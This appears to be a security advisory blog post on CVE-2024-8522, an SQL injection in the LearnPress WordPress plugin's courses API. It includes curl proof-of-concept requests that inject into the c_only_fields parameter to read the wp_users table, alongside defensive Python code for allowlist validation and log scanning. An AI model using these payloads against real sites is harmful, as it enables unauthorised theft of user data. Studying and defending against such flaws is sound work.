CVE-2024-8522 - SQL Injection in LearnPress WordPress Plugin – How It Works, Exploit Example, and What to Do Next
If you run an online learning site using LearnPress on WordPress, you need to act fast. CVE-2024-8522 has revealed a critical SQL injection flaw that could let attackers steal your website’s most sensitive data—*even if they aren't logged in*.
This guide explains the bug in plain English, gives working PoC (Proof-of-Concept) exploit code, and tells you how to stay safe.
⚠️ What is CVE-2024-8522?
This vulnerability lives in LearnPress (all versions up to and including 4.2.7), a popular LMS plugin for WordPress. The bug is found in the /wp-json/learnpress/v1/courses REST API endpoint. If attackers send a malicious request to this API, they can trigger *SQL Injection* via the c_only_fields parameter.
- Vulnerable Plugin: LearnPress – WordPress LMS Plugin
- Affected Versions: 4.2.7 and earlier
- Vulnerable Endpoint: /wp-json/learnpress/v1/courses
- Vulnerable Parameter: c_only_fields
🔍 How Does the Attack Work?
When someone queries /wp-json/learnpress/v1/courses, one of the valid query parameters is c_only_fields. The LearnPress code doesn’t *properly escape or prepare* this value before dropping it directly into an SQL query.
Attackers can inject malicious SQL code by crafting the c_only_fields parameter, forcing the backend to execute their payload as part of the query. This could let them read arbitrary tables—like the users table (where WordPress keeps usernames, emails, and hashed passwords) or dump contents of any table.
Here is a simplified example (pseudo-code) of what goes wrong inside LearnPress’ API:
```php
// Simplified vulnerable code
$c_only_fields = $_GET['c_only_fields']; // Untrusted input, used verbatim
$sql = "SELECT $c_only_fields FROM wp_courses WHERE 1=1";
// This runs the query as-is, allowing injections!
$results = $wpdb->get_results($sql);
```
What should happen: The plugin should *escape* or *prepare* the input, so no arbitrary SQL code can be injected.
What actually happens: The input is used directly, so attackers control part of the SQL query.
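The fix is not a quoting problem: a column list is an SQL identifier, so it cannot be bound as a prepared-statement parameter, and the correct control is to validate each requested name against a fixed allowlist before any SQL is built. The following is an added illustration, not LearnPress code (the plugin is PHP; this is a language-neutral demonstration in Python). It places the page’s vulnerable pattern beside an allowlist-validated version and runs both against a constructed in-memory SQLite schema; the column names in `ALLOWED_FIELDS` and the tables are assumptions for the demo.

```python
import re
import sqlite3

# Hypothetical allowlist of columns a caller may request from the courses
# endpoint. The real plugin's column set is not shown on the page.
ALLOWED_FIELDS = {"id", "name", "slug", "price", "duration"}

# A bare SQL identifier: letters, digits and underscores only.
IDENT_RE = re.compile(r"^[a-z_][a-z0-9_]*$")


def parse_only_fields(raw: str) -> list[str]:
    """Split a comma-separated field list and keep only allowlisted identifiers.

    Raises ValueError on anything that is not a known column name, so a value
    such as 'id FROM wp_users--' is rejected before a query is ever built.
    """
    fields = []
    for part in raw.split(","):
        name = part.strip().lower()
        if not IDENT_RE.match(name) or name not in ALLOWED_FIELDS:
            raise ValueError(f"rejected field {part!r}")
        fields.append(name)
    return fields


def build_query_unsafe(raw: str) -> str:
    # Mirrors the page's vulnerable pattern: untrusted text dropped into SQL.
    return f"SELECT {raw} FROM wp_courses WHERE 1=1"


def build_query_safe(raw: str) -> str:
    # The column list is rebuilt from validated names, never from raw input.
    cols = ", ".join(parse_only_fields(raw))
    return f"SELECT {cols} FROM wp_courses WHERE 1=1"


def run_demo(raw: str, safe: bool) -> list[tuple]:
    """Execute the built query against a constructed in-memory schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_courses (id INTEGER, name TEXT, slug TEXT, price REAL, duration INTEGER);
        CREATE TABLE wp_users (id INTEGER, user_login TEXT, user_email TEXT);
        INSERT INTO wp_courses VALUES (1, 'Intro', 'intro', 0, 30);
        INSERT INTO wp_users VALUES (7, 'admin', 'admin@example.invalid');
    """)
    sql = build_query_safe(raw) if safe else build_query_unsafe(raw)
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    print(run_demo("id,name", safe=True))          # rows from wp_courses
    print(run_demo("id FROM wp_users--", safe=False))  # unsafe path reads wp_users
    try:
        run_demo("id FROM wp_users--", safe=True)
    except ValueError as exc:
        print("safe path:", exc)                    # rejected before reaching the DB
```

The design point is that validation happens on the identifier level: `parse_only_fields` never passes a space, keyword or comment marker through, and the SQL string is assembled only from names the application itself owns.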
🛠️ Exploit Example (Proof-of-Concept)
Here’s a real-world attack that dumps all usernames and emails from the WordPress users table via a single HTTP request.
Exploit Request
```bash
curl -s -X GET "https://vulnerable-site.com/wp-json/learnpress/v1/courses?c_only_fields=id FROM wp_users--"
```
The injected value is:
```
c_only_fields=id FROM wp_users--
```
This input manipulates the query so that it reads directly from the wp_users table instead of the original one.
You could also do:
```bash
curl -s -X GET "https://vulnerable-site.com/wp-json/learnpress/v1/courses?c_only_fields=user_login,email FROM wp_users--"
```
More Advanced Attack
Attackers can use SQL UNION queries or other tricks to get password hashes, or even modify the database if the database account the plugin uses has elevated privileges.
If you use LearnPress
1. Update Immediately: Upgrade to the latest patched version from the official plugin page.
2. Disable the Plugin: If no update is available, temporarily *disable LearnPress* until it is fixed.
3. Check for Signs of Compromise: Review web server logs for unusual requests to /wp-json/learnpress/v1/courses, especially c_only_fields values that contain spaces, SQL keywords or comment markers rather than a plain list of column names.
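To make step 3 concrete, here is an added example (not part of the original post or the plugin) of a small log scanner. It assumes Apache/nginx combined access-log format, parses each request target, and flags hits on the courses endpoint whose c_only_fields value is anything other than a comma-separated list of bare identifiers. The four log lines are constructed for the demo and use documentation IP ranges.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Sep/2024:09:20:01 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=id,name HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Sep/2024:09:21:14 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=id%20FROM%20wp_users-- HTTP/1.1" 200 733 "-" "curl/8.4.0"
198.51.100.9 - - [12/Sep/2024:09:21:40 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=user_login%2Cuser_email%20FROM%20wp_users-- HTTP/1.1" 200 901 "-" "curl/8.4.0"
192.0.2.44 - - [12/Sep/2024:09:25:03 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "/wp-json/learnpress/v1/courses"
# A legitimate value is a comma-separated list of bare identifiers; anything
# else (spaces, keywords, quotes, comment markers) is worth a closer look.
SAFE_VALUE_RE = re.compile(r"^[A-Za-z0-9_]+(,[A-Za-z0-9_]+)*$")


def parse_line(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": parts.path,
        # parse_qs percent-decodes, so %20 and %2C become ' ' and ','.
        "query": parse_qs(parts.query, keep_blank_values=True),
        "status": int(m.group("status")),
    }


def is_suspicious(entry):
    """True when the request hits the courses endpoint with a malformed field list."""
    if entry is None or entry["path"] != ENDPOINT:
        return False
    values = entry["query"].get("c_only_fields", [])
    return any(not SAFE_VALUE_RE.match(v) for v in values)


def scan(log_text):
    """Return (ip, timestamp, decoded c_only_fields value) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if is_suspicious(entry):
            hits.append((entry["ip"], entry["ts"], entry["query"]["c_only_fields"][0]))
    return hits


if __name__ == "__main__":
    for ip, ts, value in scan(SAMPLE_LOG):
        print(f"{ts} {ip} c_only_fields={value!r}")
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents. A 200 status on a flagged line does not prove data left the server, but repeated hits from one client with a rising response size are the pattern to escalate on.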
📚 Official References and Further Reading
- Original Wordfence Advisory
- Plugin vulnerability at WPScan
- LearnPress WordPress Plugin page
- OWASP SQL Injection Guide
📝 Summary
CVE-2024-8522 is a classic, dangerous SQL injection bug in the LearnPress LMS plugin. Attackers can exploit this from anywhere on the internet to read, steal, or even tamper with your database—all without logging in.
Patch now, or risk total compromise.
If you share this post or refer to it, please credit [this exclusive guide]. Stay safe!
*If you have any questions or want to know how to check if your site is already affected, feel free to ask!*
Timeline
Published on: 09/12/2024 09:15:05 UTC
Last modified on: 09/13/2024 16:12:30 UTC